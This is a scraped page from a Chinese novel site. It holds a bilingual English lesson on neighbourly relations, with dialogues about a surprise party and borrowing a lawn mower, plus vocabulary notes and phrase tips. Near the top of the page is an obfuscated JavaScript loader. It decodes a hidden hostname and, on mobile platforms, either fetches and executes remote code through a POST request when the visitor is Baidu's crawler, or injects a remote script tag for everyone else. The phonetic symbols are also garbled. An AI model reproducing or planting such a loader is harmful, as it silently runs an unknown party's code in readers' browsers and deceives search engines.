妙书阁小说

阅读记录  |   用户书架
上一页
目录 | 设置
下一章
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2Rqa2JjamtzYmRzdnYuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};

04 左邻右舍(2 / 2)

加入书签 | 推荐本书 | 问题反馈 |

家是你的庇护所。和邻居相处得如何对你的健康安宁和幸福起着举足轻重的作用。那么怎样和那些讨人嫌的邻居相处呢?如果你的邻居经常演奏音乐、聚会到很晚,你怎样让他停止呢?你可以把这些问题提出来,引起邻居的注意,他们会乐于尽量减少对你的困扰的。你可以说“我睡觉很容易醒或者我有偏头痛。你能帮帮忙晚上把声音关小点吗?”或者你可以和邻居达成双方都能接受的协议。

远亲不如近邻

dialogue

sue is preparing a birthday party for her husband. her neighbor katherine comes to drop in her.

苏正在为他的先生准备生日聚会。她的邻居凯瑟琳过来拜访她。

sue: oh, katherine. please come in. i&#039;m sorry. here is a fearful mess!

苏:噢,凯瑟琳。请进。很抱歉,这里简直是一团糟。

katherine: sue, what are you doing now?

凯瑟琳:苏,你在忙什么呢?

sue: today is my husband&#039;s birthday. i want to give him a surprise, so i must get everything ready before he gets home. i&#039;m sorry for having no time to entertain you.

苏:今天是我先生的生日。我想给他一个惊喜,所以我必须在他回家之前把一切都准备好。很抱歉没时间招呼你。

katherine: never mind. what can i do to help you out?

凯瑟琳:没关系。我能帮你什么吗?

sue: that&#039;s very kind of you. can you give me a hand to pass me those balloons?

苏:你真是太好了。能帮忙把那些气球递给我吗?

katherine: no problem. here you are.

凯瑟琳:没问题。给你。

sue: thank you. you do me a big favor.

苏:谢谢你帮了我一个大忙。

katherine: that was a cake walk. it&#039;s nothing to speak of.

凯瑟琳:小事一桩。不值一提。

notes

1. fearful [&#039;fi?f?l] adj.担心的;可怕的;非常的

2. entertain [?ent?&#039;tein] v. 娱乐,使有兴趣;招待;考虑;抱有;容纳

3. balloon [b?&#039;lu:n] n. 气球,球状物;v. 使膨胀

4. a cake walk 很容易的事

小贴士

1. water afar can&#039;t quench fire, and a good neighbor is better than a brother far off.

远水难救近火,远亲不如近邻。

2. neighbors ought to respect one another.

邻里之间应该互相尊重。

3. would you like our assistance with a move?

你需要我们帮忙搬家吗?

4. could i have a ride to my company?

我可以搭便车到公司吗?

5. when my mother fell in a faint in the neighborhood, it&#039;s our neighbor who sent her to hospital immediately.

当母亲在附近晕倒时,是我们的邻居立刻把她送进了医院。

6. we should live in peace and keep fair with our neighbors.

我们应该同邻居和睦相处,保持友好关系。

7. love your neighbors as yourself.

爱邻居犹如爱自己。

好借好还

dialogue

tom&#039;s mower is out of work. he wants to borrow one from his neighbor maggie.

汤姆的割草机坏掉了。他想从邻居麦琪那里借一个。

tom: hello, is there anyone in the room?

汤姆:你好,有人在家吗?

maggie: yes. oh, tom, can i be of any help to you?

麦琪:是的。哦,汤姆,有什么事吗?

tom: my lawn mower is out of order. could i borrow yours?

汤姆:我的割草机坏了。我能借用一下你的吗?

maggie: of course. please just wait for a short moment. it&#039;s in our storage. here you are.

麦琪:当然可以。请稍等,割草机在库房里。给你。

tom: thank you. i&#039;ll give it back as soon as i finish mowing the lawn in my garden.

汤姆:谢谢。我一割完花园里的草就还给你。

maggie: take your time.

麦琪:不急。

(an hour later)

(一小时后)

tom: thanks to your mower, my garden looks tidier and more beautiful now. thank you. here is your mower.

汤姆:多亏了你的割草机,我的花园现在看起来整齐漂亮多了。谢谢。这是你的割草机。

maggie: my pleasure.

麦琪:别客气。

tom: oh, i do not want to intrude since you are so busy. bye-bye.

汤姆:哦,既然你那么忙,我就不打扰你了。再见。

maggie: bye-bye.

麦琪:再见。

notes

1. lawn [l?:n] n. 草坪,草地;n. 上等细麻布

2. mower [&#039;m?u?] n. 割草机;割草人

3. out of order 无次序的,混乱的;有毛病的,出故障的

4. storage [&#039;st?:rid?] n. 保管,贮藏;仓库;保管费;&amp;lt;计&amp;gt;存储器

5. take your time 从容做,不慌不忙

6. intrude [in&#039;tru:d] v. 闯入,侵入;打扰;干涉

小贴士

当你向别人借钱时可以说 can i bum some money off you? 或者 could you oblige me with some money? may i borrow a little mean green?(借给我点钱,好吗?)如果你不想借给别人钱,但又不好意思拒绝,可以说 i think i can swing that.(我想我应该能借给你一些吧。)如果你不想借给别人钱,可以说 i&#039;m flat broke. i have neither cross nor pile. i have not a penny.(我身无分文)。

上一页
目录
下一章
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间